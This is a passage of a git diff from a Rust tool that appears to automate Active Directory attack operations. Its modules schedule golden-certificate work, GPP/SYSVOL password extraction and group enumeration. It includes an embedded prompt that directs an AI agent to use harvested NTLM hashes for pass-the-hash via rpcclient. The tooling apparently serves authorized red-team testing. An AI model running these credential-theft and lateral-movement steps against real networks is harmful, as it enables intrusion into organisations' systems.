+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_picks_domain_sid_when_known() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_sids
+ .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into());
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(
+ work[0].domain_sid.as_deref(),
+ Some("S-1-5-21-1111-2222-3333")
+ );
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ // Dedup key uses lowercase IP (already lowercase here) and lowercase domain
+ assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local");
+ }
+
+ #[test]
+ fn collect_multiple_owned_cas_yields_multiple_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state.shares.push(make_share("192.168.58.51", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state
+ .hosts
+ .push(make_host("192.168.58.51", "ca02.fabrikam.local", true));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs
index d58b7372..3127cb0c 100644
--- a/ares-cli/src/orchestrator/automation/golden_ticket.rs
+++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs
@@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch
/// Uses the credential's own domain for NTLM auth (not the target domain) so
/// cross-domain trust authentication works — e.g. a `child.contoso.local`
/// cred can resolve the SID of `contoso.local` via its parent DC.
-async fn resolve_domain_sid(
+pub(crate) async fn resolve_domain_sid(
_domain: &str,
dc_ip: &str,
password_cred: Option<&ares_core::models::Credential>,
diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs
new file mode 100644
index 00000000..a2d6d049
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs
@@ -0,0 +1,342 @@
+//! auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL.
+//!
+//! Group Policy Preferences (GPP) XML files can contain encrypted passwords
+//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs)
+//! often contain hardcoded credentials.
+//!
+//! Dispatches two techniques per DC:
+//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc.
+//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials
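+//!
+//! An illustrative hit, assuming a typical `Groups.xml` (names and values
+//! are hypothetical):
+//!
+//! ```text
+//! <User name="backup_admin">
+//!   <Properties action="U" userName="backup_admin"
+//!               cpassword="<base64-encoded AES-256 blob>" ... />
+//! </User>
+//! ```
+//!
+//! Any such value decrypts offline with the AES-256 key Microsoft published
+//! on MSDN (the MS14-025 key), e.g. via the `gpp-decrypt` tool.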
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect GPP/SYSVOL work items from state (pure logic, no async).
+fn collect_gpp_sysvol_work(state: &StateInner) -> Vec<GppSysvolWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("gpp:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(GppSysvolWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Searches SYSVOL for GPP passwords and script credentials.
+/// Interval: 45s.
+pub async fn auto_gpp_sysvol(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("gpp_sysvol") {
+ continue;
+ }
+
+ let work: Vec<GppSysvolWork> = {
+ let state = dispatcher.state.read().await;
+ collect_gpp_sysvol_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "techniques": ["gpp_password_finder", "sysvol_script_search"],
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("gpp_sysvol");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "GPP/SYSVOL credential search dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "GPP/SYSVOL task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search");
+ }
+ }
+ }
+ }
+}
+
+struct GppSysvolWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("gpp:{}", "contoso.local");
+ assert_eq!(key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol");
+ }
+
+ #[test]
+ fn payload_contains_both_techniques() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "techniques": ["gpp_password_finder", "sysvol_script_search"],
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ let techniques = payload["techniques"].as_array().unwrap();
+ assert_eq!(techniques.len(), 2);
+ assert_eq!(techniques[0], "gpp_password_finder");
+ assert_eq!(techniques[1], "sysvol_script_search");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = GppSysvolWork {
+ dedup_key: "gpp:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn two_tasks_per_domain() {
+ // The payload dispatches two techniques in a single submission per domain
+ let techniques = ["gpp_password_finder", "sysvol_script_search"];
+ assert_eq!(techniques.len(), 2);
+ }
+
+ // --- collect_gpp_sysvol_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "gpp:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("gpp:{}", "contoso.local");
+ let key2 = format!("gpp:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs
new file mode 100644
index 00000000..43723890
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs
@@ -0,0 +1,615 @@
+//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP.
+//!
+//! Dispatches per-domain LDAP group enumeration to discover security groups,
+//! their members, and cross-domain memberships. This covers a large gap in
+//! attack surface mapping — group membership determines ACL attack paths,
+//! privilege escalation chains, and cross-domain lateral movement.
+//!
+//! The recon agent queries `(objectCategory=group)` and resolves membership
+//! recursively, including Foreign Security Principals for cross-domain groups.
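+//!
+//! Recursive membership can also be resolved server-side with the
+//! LDAP_MATCHING_RULE_IN_CHAIN matching rule (OID 1.2.840.113556.1.4.1941);
+//! an illustrative filter (the DN is made up):
+//!
+//! ```text
+//! (member:1.2.840.113556.1.4.1941:=CN=jdoe,CN=Users,DC=contoso,DC=local)
+//! ```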
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect group enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_group_enum_work(state: &StateInner) -> Vec<GroupEnumWork> {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ let all_dcs = state.all_domains_with_dcs();
+ if all_dcs.is_empty() {
+ return Vec::new();
+ }
+ debug!(
+ domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::<Vec<_>>(),
+ trusted = ?state.trusted_domains.keys().collect::<Vec<_>>(),
+ creds = state.credentials.len(),
+ hashes = state.hashes.len(),
+ "Group enum state check"
+ );
+ for (domain, dc_ip) in &all_dcs {
+ // Use separate dedup keys for cred vs hash attempts so a failed
+ // password-based attempt (e.g., mislabeled credential domain)
+ // doesn't permanently block the hash-based path.
+ let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase());
+ let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase());
+ let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase());
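+ // Illustration for "contoso.local" (keys as built above):
+ //   group_enum:contoso.local:cred  -> same-domain cleartext attempt
+ //   group_enum:contoso.local:trust -> trust-compatible credential attempt
+ //   group_enum:contoso.local:hash  -> pass-the-hash fallback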
+
+ // Prefer same-domain cleartext cred, then fall back to trust-compatible
+ // cred (child→parent or cross-forest). Trust-based attempts use a
+ // separate dedup key so they don't block hash-based fallback.
+ let (cred, using_trust_cred) =
+ if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) {
+ let c = state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .cloned();
+ (c, false)
+ } else {
+ (None, false)
+ };
+ let (cred, using_trust_cred) =
+ if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) {
+ match state.find_trust_credential(domain) {
+ Some(c) => (Some(c), true),
+ None => (None, using_trust_cred),
+ }
+ } else {
+ (cred, using_trust_cred)
+ };
+
+ // Look for NTLM hash (PTH) — fires independently of cred attempt
+ let (ntlm_hash, ntlm_hash_username) =
+ if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) {
+ state
+ .hashes
+ .iter()
+ .find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && h.username.to_lowercase() == "administrator"
+ })
+ .or_else(|| {
+ state.hashes.iter().find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_delegation_account(&h.username)
+ })
+ })
+ .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone())))
+ .unwrap_or((None, None))
+ } else {
+ (None, None)
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ debug!(
+ domain = %domain,
+ cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred),
+ trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust),
+ hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash),
+ "Group enum: no credential/hash found for domain"
+ );
+ continue;
+ }
+
+ let dedup_key = if ntlm_hash.is_some() {
+ dedup_key_hash
+ } else if using_trust_cred {
+ dedup_key_trust
+ } else {
+ dedup_key_cred
+ };
+
+ items.push(GroupEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain: domain.clone(),
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ ntlm_hash,
+ ntlm_hash_username,
+ });
+ }
+
+ items
+}
+
+/// Dispatches group enumeration per domain.
+/// Interval: 20s.
+pub async fn auto_group_enumeration(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(20));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("group_enumeration") {
+ continue;
+ }
+
+ let work: Vec<GroupEnumWork> = {
+ let state = dispatcher.state.read().await;
+ collect_group_enum_work(&state)
+ };
+
+ if !work.is_empty() {
+ info!(
+ count = work.len(),
+ domains = ?work.iter().map(|w| w.domain.as_str()).collect::<Vec<_>>(),
+ "Group enumeration work items collected"
+ );
+ }
+ for item in work {
+ // When PTH hash is available, use the hash user's identity for the target domain
+ // instead of a cross-domain credential that will fail LDAP simple bind.
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() {
+ (
+ item.ntlm_hash_username
+ .clone()
+ .unwrap_or_else(|| item.credential.username.clone()),
+ String::new(), // empty password forces PTH path
+ item.domain.clone(), // target domain, not cross-domain
+ )
+ } else {
+ (
+ item.credential.username.clone(),
+ item.credential.password.clone(),
+ item.credential.domain.clone(),
+ )
+ };
+ let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": cred_user,
+ "password": cred_pass,
+ "domain": cred_domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description", "cn"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ "instructions": concat!(
+ "Enumerate ALL security groups in this domain.\n\n",
+ "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ",
+ "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n",
+ " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ",
+ "username=user, domain=domain, hash=, command='enumdomgroups') — ",
+ "then for each group RID: 'querygroupmem ' and 'queryuser ' to resolve members.\n",
+ " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n",
+ "If a password IS provided, use ldap_search with filter (objectCategory=group) ",
+ "to enumerate groups, members, and Foreign Security Principals.\n\n",
+ "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ",
+ "(e.g. credential from child.domain.local querying parent domain.local), ",
+ "you MUST pass bind_domain= to ldap_search. ",
+ "Check the 'bind_domain' field in the task payload — if present, always pass it ",
+ "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n",
+ "For EACH group found, report it as a vulnerability:\n",
+ " vuln_type: 'group_enumerated'\n",
+ " target: the group sAMAccountName\n",
+ " target_ip: the DC IP\n",
+ " domain: the domain\n",
+ " details: {\"group_type\": \"Global/DomainLocal/Universal\", ",
+ "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ",
+ "\"admin_count\": true/false}\n\n",
+ "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ",
+ "Backup Operators, Server Operators, Account Operators, DnsAdmins, ",
+ "and any custom groups with adminCount=1.\n\n",
+ "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n",
+ "IMPORTANT: For each user found, include in discovered_users array:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}"
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+ // Attach NTLM hash for PTH when no cleartext cred for target domain
+ if let Some(ref hash) = item.ntlm_hash {
+ payload["ntlm_hash"] = json!(hash);
+ }
+ if let Some(ref user) = item.ntlm_hash_username {
+ payload["hash_username"] = json!(user);
+ }
+
+ let priority = dispatcher.effective_priority("group_enumeration");
+ match dispatcher
+ .force_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Group enumeration dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ info!(domain = %item.domain, dc = %item.dc_ip, "Group enumeration deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct GroupEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+ ntlm_hash: Option<String>,
+ ntlm_hash_username: Option<String>,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key_cred = format!("group_enum:{}:cred", "contoso.local");
+ let key_hash = format!("group_enum:{}:hash", "contoso.local");
+ assert_eq!(key_cred, "group_enum:contoso.local:cred");
+ assert_eq!(key_hash, "group_enum:contoso.local:hash");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description", "cn"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ });
+ assert_eq!(payload["technique"], "ldap_group_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert!(payload["enumerate_members"].as_bool().unwrap());
+ assert!(payload["resolve_foreign_principals"].as_bool().unwrap());
+ }
+
+ #[test]
+ fn ldap_attributes_list() {
+ let attrs = [
+ "sAMAccountName",
+ "member",
+ "memberOf",
+ "managedBy",
+ "groupType",
+ "objectSid",
+ "description",
+ "cn",
+ ];
+ assert_eq!(attrs.len(), 8);
+ assert!(attrs.contains(&"sAMAccountName"));
+ assert!(attrs.contains(&"objectSid"));
+ assert!(attrs.contains(&"managedBy"));
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = GroupEnumWork {
+ dedup_key: "group_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ ntlm_hash: None,
+ ntlm_hash_username: None,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "group_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("group_enum:{}:cred", "contoso.local");
+ let key2 = format!("group_enum:{}:cred", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_hash_fires_after_cred_dedup_burned() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Cred-based attempt already dispatched (may have failed)
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:cred".into(),
+ );
+ // Add an NTLM hash — should still generate work via hash path
+ state.hashes.push(ares_core::models::Hash {
+ id: "h1".into(),
+ username: "Administrator".into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(),
+ hash_type: "ntlm".into(),
+ domain: "contoso.local".into(),
+ source: "secretsdump".into(),
+ cracked_password: None,
+ discovered_at: None,
+ parent_id: None,
+ aes_key: None,
+ attack_step: 0,
+ });
+ let work = collect_group_enum_work(&state);
+ assert_eq!(
+ work.len(),
+ 1,
+ "hash path should fire even after cred dedup burned"
+ );
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash");
+ assert!(work[0].ntlm_hash.is_some());
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:cred".into(),
+ );
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:hash".into(),
+ );
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_cred_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot)
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 0, "cross-domain cred should not produce work");
+ }
+
+ #[test]
